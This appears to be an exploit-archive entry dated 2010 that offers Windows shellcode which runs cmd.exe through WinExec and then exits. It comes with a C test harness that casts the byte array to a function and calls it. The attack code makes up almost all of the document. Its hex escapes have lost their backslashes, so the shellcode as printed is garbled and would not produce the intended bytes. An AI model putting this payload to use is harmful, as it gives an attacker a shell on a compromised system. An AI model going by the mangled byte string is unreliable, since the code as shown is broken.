[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Published : 2010-06-25
# Author : RubberDuck
# Previous Title : ShellCode WinXP SP3 SPA URLDownloadToFileA + CreateProcessA + ExitProcess
# Next Title : Linux/x86-64 - Add root user with password - 390 bytes
/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"xFCx33xD2xB2x30x64xFFx32x5Ax8B"
"x52x0Cx8Bx52x14x8Bx72x28x33xC9"
"xB1x18x33xFFx33xC0xACx3Cx61x7C"
"x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
"x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
"x12x75xDAx8Bx53x3Cx03xD3xFFx72"
"x34x8Bx52x78x03xD3x8Bx72x20x03"
"xF3x33xC9x41xADx03xC3x81x38x47"
"x65x74x50x75xF4x81x78x04x72x6F"
"x63x41x75xEBx81x78x08x64x64x72"
"x65x75xE2x49x8Bx72x24x03xF3x66"
"x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
"x8Ex03xD3x52x68x78x65x63x01xFE"
"x4Cx24x03x68x57x69x6Ex45x54x53"
"xFFxD2x68x63x6Dx64x01xFEx4Cx24"
"x03x6Ax05x33xC9x8Dx4Cx24x04x51"
"xFFxD0x68x65x73x73x01x8BxDFxFE"
"x4Cx24x03x68x50x72x6Fx63x68x45"
"x78x69x74x54xFFx74x24x20xFFx54"
"x24x20x57xFFxD0";
printf("Size = %dn", strlen(shellcode));
system("PAUSE");
((void (*)())shellcode)();
return 0;
}